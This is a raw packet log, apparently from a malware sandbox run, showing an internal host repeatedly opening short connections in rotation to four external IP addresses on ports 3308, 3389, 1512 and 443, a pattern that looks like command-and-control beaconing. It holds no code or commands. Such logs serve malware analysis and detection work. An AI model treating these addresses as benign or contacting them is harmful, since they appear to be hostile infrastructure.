Jan 12, 2021 07:44:20.366441011 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.366477013 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.366657019 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.378618956 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.421817064 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.495999098 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.551039934 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.551160097 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.552675009 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.606887102 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.629741907 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.629781008 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.629868984 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.635050058 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.693989038 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.694169044 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.704415083 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.704655886 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.760004997 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.763709068 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.798830986 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.818614006 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.818640947 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.909120083 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.909168959 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:20.909209967 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.909240007 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.914911032 CET	49254	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:20.970093966 CET	3389	49254	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:21.045356989 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.098418951 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.098525047 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.100008965 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.152863026 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.159795046 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.159830093 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.159904003 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.166862965 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.220884085 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.221044064 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.230365992 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.230576992 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.283431053 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.283679008 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.321672916 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.336607933 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.437438011 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.437463045 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.437791109 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.443681002 CET	49255	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:21.496548891 CET	1512	49255	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:21.556463003 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.608766079 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.608874083 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.610466003 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.662446976 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.677202940 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.677315950 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.691550016 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.745970964 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.746124029 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.756028891 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.756450891 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.808502913 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.808702946 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.846702099 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.860723972 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.979859114 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.979911089 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:21.980122089 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:21.985820055 CET	49256	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:22.037900925 CET	443	49256	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:22.102606058 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.145751953 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.145848036 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.147295952 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.190227985 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.204480886 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.204504013 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.204571009 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.223145962 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.268836975 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.268951893 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.274185896 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.274384022 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.317358017 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.317604065 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.357755899 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.360620022 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.360632896 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.473510981 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.473548889 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.473573923 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.473601103 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.475804090 CET	49257	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:22.518820047 CET	3308	49257	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:22.586040974 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.640295029 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.640403032 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.641777992 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.695486069 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.711411953 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.711451054 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.711690903 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.726152897 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.787244081 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.787334919 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.795242071 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.795424938 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.848939896 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.849108934 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.888793945 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.902837992 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.902856112 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.991435051 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.991458893 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:22.991758108 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:22.997437000 CET	49258	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:23.052223921 CET	3389	49258	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:23.116909027 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.169769049 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.169867039 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.171559095 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.224342108 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.231198072 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.231221914 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.231290102 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.250139952 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.304284096 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.304640055 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.308388948 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.308491945 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.361325979 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.361603975 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.398339987 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.414589882 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.414617062 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.514954090 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.515002966 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.515230894 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.521929026 CET	49259	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:23.575053930 CET	1512	49259	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:23.626741886 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.679929018 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:23.680041075 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.681498051 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.733541012 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:23.748641968 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:23.748714924 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.758224964 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.812724113 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:23.812926054 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.818048954 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.818201065 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.870510101 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:23.870608091 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:23.922915936 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:24.040817022 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:24.040868044 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:24.041134119 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:24.043935061 CET	49260	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:24.096009970 CET	443	49260	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:24.162688017 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.205919981 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.206008911 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.206727028 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.249795914 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.260366917 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.260406017 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.260512114 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.260540962 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.271262884 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.316108942 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.316365004 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.326859951 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.327124119 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.370291948 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.370533943 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.410100937 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.413733959 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.413753986 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.525876999 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.525899887 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.526128054 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.532452106 CET	49261	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:24.575531006 CET	3308	49261	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:24.645827055 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.699650049 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.699721098 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.700545073 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.754406929 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.776556969 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.776590109 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.776648998 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.776668072 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.786526918 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.845490932 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.845597982 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.849747896 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.849845886 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.903537989 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.903775930 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:24.943295956 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.957737923 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:24.957760096 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:25.051625013 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:25.051655054 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:25.051800013 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:25.051887989 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:25.057640076 CET	49262	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:25.112003088 CET	3389	49262	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:25.176079035 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.229327917 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.229454041 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.230988026 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.285753012 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.292529106 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.292553902 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.292618990 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.308590889 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.362751007 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.363064051 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.373348951 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.373720884 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.426661968 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.427015066 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.465831995 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.480012894 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.480041981 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.583403111 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.583429098 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.583648920 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.589498043 CET	49263	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:25.642472029 CET	1512	49263	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:25.706538916 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.758450985 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:25.758559942 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.760112047 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.812052965 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:25.826719046 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:25.826889992 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.845303059 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.899687052 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:25.902102947 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.911322117 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.911503077 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:25.963258028 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:25.963669062 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:26.015397072 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:26.134597063 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:26.134629965 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:26.134782076 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:26.138010025 CET	49264	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:26.189764023 CET	443	49264	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:26.252547979 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.295789957 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.296017885 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.297060966 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.340188980 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.350785017 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.350815058 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.350976944 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.402343988 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.447297096 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.447369099 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.583744049 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.583892107 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.626940966 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.627017021 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.670346022 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.784126043 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.784168005 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.784356117 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.790679932 CET	49265	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:26.833849907 CET	3308	49265	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:26.908003092 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:26.962085962 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:26.962157965 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.190511942 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.244503975 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.259582043 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.259603977 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.259639025 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.260327101 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.265460014 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.323894024 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.323952913 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.331985950 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.332097054 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.386348009 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.386445045 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.425863028 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.440366983 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.440393925 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.530966043 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.530999899 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.531105042 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.531160116 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.533883095 CET	49266	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:27.588337898 CET	3389	49266	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:27.684606075 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:27.739181995 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:27.739408016 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.203052998 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.256139994 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.263019085 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.263051033 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.263113022 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.263737917 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.270539999 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.324889898 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.325011015 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.339396954 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.339545965 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.392505884 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.392678976 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.429678917 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.445723057 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.549735069 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.549772024 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.549998045 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.652065992 CET	49267	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:28.705327034 CET	1512	49267	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:28.759799004 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.812048912 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:28.812176943 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.813549042 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.865622044 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:28.880371094 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:28.880492926 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.893954992 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.948649883 CET	443	49268	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:28.948764086 CET	49268	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:28.962270021 CET	49268	443	192.168.2.22	77.220.64.37
